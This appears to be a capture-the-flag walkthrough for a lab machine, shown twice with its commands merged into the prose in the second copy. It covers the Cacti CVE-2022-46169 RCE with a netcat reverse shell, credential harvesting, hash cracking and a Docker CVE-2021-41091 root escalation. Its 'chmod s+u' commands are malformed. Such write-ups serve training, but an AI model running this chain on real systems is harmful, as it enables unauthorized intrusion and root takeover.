User
First we start with a rustscan scan to find open ports:
```
Open 10.10.11.211:22
Open 10.10.11.211:80
```
Two ports are open, visting the web server shows a Cacti server. The Cacti version is shown on the application
Version: 1.2.22
This is vulnerable to an unauthenticated RCE exploit: CVE-2022-46169
Download and use the following script to get RCE:
1. open a netcat listener
2. Run the exploit
Now you have a shell as www-data, reading the /var/www/html/include/config.php file we can find the mysql database login credentials which are "root:root"
We can login to the mysql database to find 2 users with their hashes (I used chisel to create a reverse proxy and open the mysql locally):
Table: user_auth
Running JTR with rockyou.txt we can crack marcus' password:
These credentials also work with the SSH login.
Root
Now you have SSH'ed to the box as "marcus"
Reading marcus' mail we find an admin explaining a few vulnerabilities
The one we need to exploit to gain root access is CVE-2021-41091, which exploits the docker container running on the host.
But before we can use CVE-2021-41091, we need to first turn the /bin/bash file on the docker container into an SUID binary with
To do this, gain access to the docker container with the Cacti exploit from above, find that the 'capsh' file is an SUID binary, use this to gain root access on the docker container:
Now add the SUID bit to the bash binary:
Now we can use the CVE-2021-41091 exploit on the host machine-
This will exploit the docker container and we can now run the /bin/bash binary from the container with -p (so it doesnt drop privileges)
~ pwned ~
First we start with a rustscan scan to find open ports:
```
Open 10.10.11.211:22
Open 10.10.11.211:80
```
Two ports are open, visting the web server shows a Cacti server. The Cacti version is shown on the application
Version: 1.2.22
This is vulnerable to an unauthenticated RCE exploit: CVE-2022-46169
Download and use the following script to get RCE:
https://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.221. open a netcat listener
nc -lnvp 12342. Run the exploit
python3 expl.py -u http://10.10.11.211/ --LHOST=<localip> --LPORT=1234Now you have a shell as www-data, reading the /var/www/html/include/config.php file we can find the mysql database login credentials which are "root:root"
We can login to the mysql database to find 2 users with their hashes (I used chisel to create a reverse proxy and open the mysql locally):
Table: user_auth
admin:$2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjCmarcus:$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4CRunning JTR with rockyou.txt we can crack marcus' password:
marcus:funkymonkeyThese credentials also work with the SSH login.
Root
Now you have SSH'ed to the box as "marcus"
Reading marcus' mail we find an admin explaining a few vulnerabilities
cat /var/mail/marcusThe one we need to exploit to gain root access is CVE-2021-41091, which exploits the docker container running on the host.
But before we can use CVE-2021-41091, we need to first turn the /bin/bash file on the docker container into an SUID binary with
chmod s+u /bin/bashTo do this, gain access to the docker container with the Cacti exploit from above, find that the 'capsh' file is an SUID binary, use this to gain root access on the docker container:
capsh --gid=0 --uid=0 -- (https://gtfobins.github.io/gtfobins/capsh/)Now add the SUID bit to the bash binary:
chmod s+u /bin/bashNow we can use the CVE-2021-41091 exploit on the host machine-
https://github.com/UncleJ4ck/CVE-2021-41091This will exploit the docker container and we can now run the /bin/bash binary from the container with -p (so it doesnt drop privileges)
/var/lib/docker/overlay2/<HASH>/merged/bin/bash -p~ pwned ~
